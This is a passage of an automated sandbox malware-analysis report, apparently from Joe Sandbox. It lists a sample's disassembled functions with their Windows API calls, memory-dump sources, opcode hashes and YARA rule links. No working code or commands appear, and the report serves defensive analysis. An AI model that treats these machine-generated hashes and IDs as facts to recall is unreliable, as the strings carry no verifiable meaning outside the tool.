                                                                                  Function 004307A0 Relevance: 3.6, APIs: 2, Instructions: 597COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 004307E4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: ProcessorVirtual$Concurrency::RootRoot::
                                                                                  • String ID:
                                                                                  • API String ID: 3936482309-0
                                                                                  • Opcode ID: 4df94f01e9097f76775214a2133e64fe943ad29cae760b09641aaa238c9e330e
                                                                                  • Instruction ID: b94647dcf1c3cb02d1d7989e41e59dd63cc95e1da4bb0be2e91c54ba973cf444
                                                                                  • Opcode Fuzzy Hash: 4df94f01e9097f76775214a2133e64fe943ad29cae760b09641aaa238c9e330e
                                                                                  • Instruction Fuzzy Hash: AA62C234A00219CFDB68DF54C890BDDB7B2BB58308F24929AD4596B395CB74AEC6CF44
                                                                                  Function 00450784 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 82COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog3.LIBCMT ref: 0045078B
                                                                                    • Part of subcall function 004575CB: _memset.LIBCMT ref: 004575DD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog3_memset
                                                                                  • String ID: ank
                                                                                  • API String ID: 2828583354-2538243836
                                                                                  • Opcode ID: 367366c12be5fce0cde8e24113283c0714d6b3640caf9c0fd48634587c853577
                                                                                  • Instruction ID: 390b0fbe61fcfa768a89a4363a0b4a659a93c37f7ec9aba5daa5290a84828d0b
                                                                                  • Opcode Fuzzy Hash: 367366c12be5fce0cde8e24113283c0714d6b3640caf9c0fd48634587c853577
                                                                                  • Instruction Fuzzy Hash: 2A316C7180024EAADF11EFE1DC45EEEBF78EF54304F10402AF905A7152EA789A49DBA5
                                                                                  Function 00409670 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00433150: _memset.LIBCMT ref: 004331B0
                                                                                    • Part of subcall function 00433150: _rand.LIBCMT ref: 00433200
                                                                                    • Part of subcall function 00433150: _strlen.LIBCMT ref: 004338E3
                                                                                  • _strlen.LIBCMT ref: 00409740
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _strlen$_memset_rand
                                                                                  • String ID: data.txt
                                                                                  • API String ID: 1938946822-2335734025
                                                                                  • Opcode ID: a74a4b147fbb68d91680602c60ec8963fc3022eda1cd022aff5d8c0020813356
                                                                                  • Instruction ID: 9aad00d02f828d9cf4d6aa3d614c259e7ac78d4ab76df89f23a3c8e0015c2c05
                                                                                  • Opcode Fuzzy Hash: a74a4b147fbb68d91680602c60ec8963fc3022eda1cd022aff5d8c0020813356
                                                                                  • Instruction Fuzzy Hash: 7D2174B1D04248DEEB00DFA5DC057EE7BF45B09308F14406DD5057B282D7BE6648CBA9
                                                                                  Function 0044B996 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog3
                                                                                  • String ID: PQJ
                                                                                  • API String ID: 431132790-2790535993
                                                                                  • Opcode ID: 83f3a5ca81fca0acbf06fcfd260204c7da74b8ce0988781578e33917163ac686
                                                                                  • Instruction ID: 1ee6ec5981f029bd2a2bd2fc1b0ebffaa0ba43b42ed90405a8c48d3c50c0e257
                                                                                  • Opcode Fuzzy Hash: 83f3a5ca81fca0acbf06fcfd260204c7da74b8ce0988781578e33917163ac686
                                                                                  • Instruction Fuzzy Hash: 1E018471504248AAEF14EF599805BAD7BA4EF04324F10C12FFA28D6281D7BC8A009B9D
                                                                                  Function 0046BC2D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: __fclose_nolock
                                                                                  • String ID: *8C
                                                                                  • API String ID: 4232755567-852604661
                                                                                  • Opcode ID: 9a6b4c9852ff29c33f11b76970ab2ae6d741044081e15f4e0ce0ea66c17ab77d
                                                                                  • Instruction ID: 0a8ac03627f501b6d80e9e70dc24df4f6d00319177a7f2100748817241602a3a
                                                                                  • Opcode Fuzzy Hash: 9a6b4c9852ff29c33f11b76970ab2ae6d741044081e15f4e0ce0ea66c17ab77d
                                                                                  • Instruction Fuzzy Hash: BEF0C870C0060095C720AB6E8801A5E7AA0DF42334F10C26FE479D61D1EF3C47825B8F
                                                                                  Function 6A6E4440 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • FindResourceA.KERNEL32(0000E000,?,00000006), ref: 6A6E4457
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: FindResource
                                                                                  • String ID: NHoj
                                                                                  • API String ID: 1635176832-1795478340
                                                                                  • Opcode ID: bd97a3092ae6dac5f10e1ffdd6ace37e1e61726f339108b0cde6b608c62c30cb
                                                                                  • Instruction ID: be757edf717517e3dfd6ca98f1c077798d3874730fbd7b48dac425738ea8e75f
                                                                                  • Opcode Fuzzy Hash: bd97a3092ae6dac5f10e1ffdd6ace37e1e61726f339108b0cde6b608c62c30cb
                                                                                  • Instruction Fuzzy Hash: 5BD02B263181207AE500051FBC48DBB73FCDFC1A35F09802AF885D6140D6B4AC53A5B1
                                                                                  Function 00441570 Relevance: 3.3, APIs: 2, Instructions: 269COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0b10c5da79b61c569c79d1e34ecf045a862689e6fdb87559b0278fbe4c6a84b6
                                                                                  • Instruction ID: b4b7a06123ece10e633aa6e29246d5e16198db7511657887826e787ce01a2d3c
                                                                                  • Opcode Fuzzy Hash: 0b10c5da79b61c569c79d1e34ecf045a862689e6fdb87559b0278fbe4c6a84b6
                                                                                  • Instruction Fuzzy Hash: 35C1C4B4A00209EFEB04DF98C584BAEB7B1FF48304F24819AE8156B391D735AE85DF45
                                                                                  Function 0BE94878 Relevance: 3.1, APIs: 2, Instructions: 126COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0e81d37a345bc1f8f0cc6f9863444428a4d4c69417af1cc8b8c7a3cb07f3c4f3
                                                                                  • Instruction ID: 27c24f1cd0f0e751fa3959e0984b855749b06dccd518ae45e466147fba2e2d61
                                                                                  • Opcode Fuzzy Hash: 0e81d37a345bc1f8f0cc6f9863444428a4d4c69417af1cc8b8c7a3cb07f3c4f3
                                                                                  • Instruction Fuzzy Hash: 5441AD70900246DFDF38DF7AF08475A3BF1AB89318F156159E8598B380E770CA9ACB55
                                                                                  Function 0042EE10 Relevance: 3.1, APIs: 2, Instructions: 108windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SendMessageA.USER32(?), ref: 0042EEC8
                                                                                  • SendMessageA.USER32(?,000083F4,?,?), ref: 0042EEFF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID:
                                                                                  • API String ID: 3850602802-0
                                                                                  • Opcode ID: 4fa584b0a2ed7970015e4984acbaa877dcc50fb3bdc3585c0af49128e01a110c
                                                                                  • Instruction ID: 75d7f013a3e4a15d4e083539d0650aa2a8554d84433bfb35e4e7c3e210ea4f17
                                                                                  • Opcode Fuzzy Hash: 4fa584b0a2ed7970015e4984acbaa877dcc50fb3bdc3585c0af49128e01a110c
                                                                                  • Instruction Fuzzy Hash: 7E410B74A00249EFCB04DF95D584AAEBBB5FF48310F618299E8199B351C734EE42CFA4
                                                                                  Function 0044B027 Relevance: 3.1, APIs: 2, Instructions: 104COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 0044B047
                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,00409C74,Function_00008B20,00000000), ref: 0044B0E1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseHandle_memset
                                                                                  • String ID:
                                                                                  • API String ID: 900656945-0
                                                                                  • Opcode ID: f496cc6c020ad3bde3618cc50923a222c8bd5a73da298168fc8f1a9695ff664c
                                                                                  • Instruction ID: 0be551aa10e4cf54a87f88e6155b20563739340b2a32a959c6581a3fbf4ffaec
                                                                                  • Opcode Fuzzy Hash: f496cc6c020ad3bde3618cc50923a222c8bd5a73da298168fc8f1a9695ff664c
                                                                                  • Instruction Fuzzy Hash: B731ACB2C00209BFDF11BFA58C81DAFBBB8EF48354F10856AF610B2251D73899429F94
                                                                                  Function 00404740 Relevance: 3.1, APIs: 2, Instructions: 102COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memmove_s
                                                                                  • String ID:
                                                                                  • API String ID: 800865076-0
                                                                                  • Opcode ID: ceef347175e8db6de08bab33336f9eb44bbc1801ab1258b589a60e9bf10a3238
                                                                                  • Instruction ID: 06c13b7bb894df7a66d7d15d3376037dda0370fb72c973310e3a761aba051568
                                                                                  • Opcode Fuzzy Hash: ceef347175e8db6de08bab33336f9eb44bbc1801ab1258b589a60e9bf10a3238
                                                                                  • Instruction Fuzzy Hash: FD418279E00108EFCB08DF99D49499DF7B2EF89314F10C15AE915AB364DB35A941CF54
                                                                                  Function 004257C0 Relevance: 3.1, APIs: 2, Instructions: 84windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SendMessageA.USER32(00000000,00000030,004A8C94,00000000), ref: 00425876
                                                                                  • SendMessageA.USER32(00000000,000001A0,000000FF,?), ref: 004258A2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID:
                                                                                  • API String ID: 3850602802-0
                                                                                  • Opcode ID: bc335449d85492de55deab32beb8eab24af2b27b043a2e3ff59a4220d6774b36
                                                                                  • Instruction ID: 6c926e64ed21cbf0bf1ea527843c4211a97e374d6657de467ba760ed327cdcc6
                                                                                  • Opcode Fuzzy Hash: bc335449d85492de55deab32beb8eab24af2b27b043a2e3ff59a4220d6774b36
                                                                                  • Instruction Fuzzy Hash: 1731D971A00208EFEB04DF94D955BAEB7B5EB48300F2082A9E915AB280D6749E11DB98
                                                                                  Function 0042A320 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _strlen.LIBCMT ref: 0042A373
                                                                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 0042A3E6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend_strlen
                                                                                  • String ID:
                                                                                  • API String ID: 3939138701-0
                                                                                  • Opcode ID: d26ba3268de8652e7f6b4a0adade547fcf2bf92870012938307f26f41c2d0c73
                                                                                  • Instruction ID: 06827b4b7a0950c66db9dc926f0246985dfb2cc0dcac069d4a554fcb11e4bb9f
                                                                                  • Opcode Fuzzy Hash: d26ba3268de8652e7f6b4a0adade547fcf2bf92870012938307f26f41c2d0c73
                                                                                  • Instruction Fuzzy Hash: FD312DB0A00248DBCB04DF94D991BAFBBB5AF48304F20811EAD06AB345D7389A55CB99
                                                                                  Function 6A6E1A50 Relevance: 3.1, APIs: 2, Instructions: 70COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset_strncpy
                                                                                  • String ID:
                                                                                  • API String ID: 3140232205-0
                                                                                  • Opcode ID: 2f245ab8778eda46ee2d51aecb5f2b06c7af3602b7ca935219b03933d189649a
                                                                                  • Instruction ID: b122bf973f758116ea1e65ed59e61da23d2d367533e9fe73fcca4dd926c6f3cb
                                                                                  • Opcode Fuzzy Hash: 2f245ab8778eda46ee2d51aecb5f2b06c7af3602b7ca935219b03933d189649a
                                                                                  • Instruction Fuzzy Hash: FA21D2716083049FD314CF59D8959EBB7E9FBD9308F41492DE188C3241EE75AA498BE2
                                                                                  Function 00424300 Relevance: 3.1, APIs: 2, Instructions: 70windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _strlen.LIBCMT ref: 00424354
                                                                                  • SendMessageA.USER32(?,00000030,004A8C94,00000000), ref: 004243B2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend_strlen
                                                                                  • String ID:
                                                                                  • API String ID: 3939138701-0
                                                                                  • Opcode ID: 80da9279a3a0bde48a42c59257073623c6c6db6d5a60c7e76e01edd3bca5d4fc
                                                                                  • Instruction ID: fb5fb24ae44d4a52bfc51c8ddee00626155474bc6a937a0f95f6afaa08723881
                                                                                  • Opcode Fuzzy Hash: 80da9279a3a0bde48a42c59257073623c6c6db6d5a60c7e76e01edd3bca5d4fc
                                                                                  • Instruction Fuzzy Hash: 14210CB1A00218DFDB04DF95D891BAE77B5FF88304F10821AF909AB341D774D910CB95
                                                                                  Function 004254E0 Relevance: 3.1, APIs: 2, Instructions: 64windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 0042550E
                                                                                    • Part of subcall function 00420690: _memset.LIBCMT ref: 004206B5
                                                                                  • SendMessageA.USER32(?,00000030,004A8C94,00000000), ref: 00425597
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$MessageSend
                                                                                  • String ID:
                                                                                  • API String ID: 2497471678-0
                                                                                  • Opcode ID: a05c6f9311e8f4713f13ad1699b594822c734aa248559991c2f36b9c19a4dac8
                                                                                  • Instruction ID: f9e6eea926a12ec3bd772ddd132449135aa46cbb1fa14d62a86f1ba887566e2e
                                                                                  • Opcode Fuzzy Hash: a05c6f9311e8f4713f13ad1699b594822c734aa248559991c2f36b9c19a4dac8
                                                                                  • Instruction Fuzzy Hash: 20219371A0021CABD718DF54DC43FEA7378AB48700F40419DB7099B281DAB4AE80CFA5
                                                                                  Function 00404D10 Relevance: 3.1, APIs: 2, Instructions: 62COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 00404D42
                                                                                  • GetPrivateProfileStringA.KERNEL32(?,?,00486D9D,?,00000400,?), ref: 00404D79
                                                                                    • Part of subcall function 00405EA0: _strlen.LIBCMT ref: 00405EB3
                                                                                    • Part of subcall function 00406360: __mbsinc.LIBCMT ref: 0040638E
                                                                                    • Part of subcall function 00406360: _memmove_s.LIBCMT ref: 00406450
                                                                                    • Part of subcall function 004062D0: __mbsinc.LIBCMT ref: 00406324
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: __mbsinc$PrivateProfileString_memmove_s_memset_strlen
                                                                                  • String ID:
                                                                                  • API String ID: 2645958744-0
                                                                                  • Opcode ID: 2cacdfa7e0c7f78f62c9b683b61e5f620819ac63444be32352c6f19a40fc337d
                                                                                  • Instruction ID: c144573c4ba01f06b049e1f8e79028ca557a145e8ff996cdf194c253c0205f49
                                                                                  • Opcode Fuzzy Hash: 2cacdfa7e0c7f78f62c9b683b61e5f620819ac63444be32352c6f19a40fc337d
                                                                                  • Instruction Fuzzy Hash: FE210E70A00208ABCB04EFA5DC92EEEBB74AF44304F50456DF615772D2DF786A55CB98
                                                                                  Function 00433C80 Relevance: 3.1, APIs: 2, Instructions: 61networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • socket.WS2_32(?,00000002,00000001,00000000), ref: 00433CA2
                                                                                  • ioctlsocket.WS2_32(?,00000000,8004667E,00000001,?,00000002,00000001,00000000), ref: 00433CDE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: ioctlsocketsocket
                                                                                  • String ID:
                                                                                  • API String ID: 416004797-0
                                                                                  • Opcode ID: 2238cc13a2a97a4dd49cdd68b5cae328d8ad7cc1a14feb0476f56a1283ddc202
                                                                                  • Instruction ID: c3fa6a9c5008dc6e90b83981714f416302fa7969edf922430d15e5f29beaebeb
                                                                                  • Opcode Fuzzy Hash: 2238cc13a2a97a4dd49cdd68b5cae328d8ad7cc1a14feb0476f56a1283ddc202
                                                                                  • Instruction Fuzzy Hash: 0611D030A04319ABDF54DF21C989BBAB3B8FF49305F5040DEE805AB251D77A9E86CB54
                                                                                  Function 00478D47 Relevance: 3.1, APIs: 2, Instructions: 61COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CloseHandle.KERNEL32(00000000,00000000,004367BD,?,00478E7C,004367BD,0049F098,00000010,0046BC06,00000000,004367BD,004367BD,004367BD,00000000,*8C), ref: 00478D99
                                                                                  • __dosmaperr.LIBCMT ref: 00478DD2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseHandle__dosmaperr
                                                                                  • String ID:
                                                                                  • API String ID: 1450245014-0
                                                                                  • Opcode ID: 0f25b3828fc6950bcf3a590c979c69daebfade1f22a97c5f2ff18c88edc7616d
                                                                                  • Instruction ID: 12829da9ceb53137e8d8f01e46157a94e31bbc4ee5a0f984d90109dff1ce9c8e
                                                                                  • Opcode Fuzzy Hash: 0f25b3828fc6950bcf3a590c979c69daebfade1f22a97c5f2ff18c88edc7616d
                                                                                  • Instruction Fuzzy Hash: 3A01043254222459C63526395C8DBEB26488BD2728F35812FF91CDB3D2DF6DDC42429E
                                                                                  Function 0BEEC47C Relevance: 3.1, APIs: 2, Instructions: 60COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0BEEC4E3
                                                                                  • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0BEEC510
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
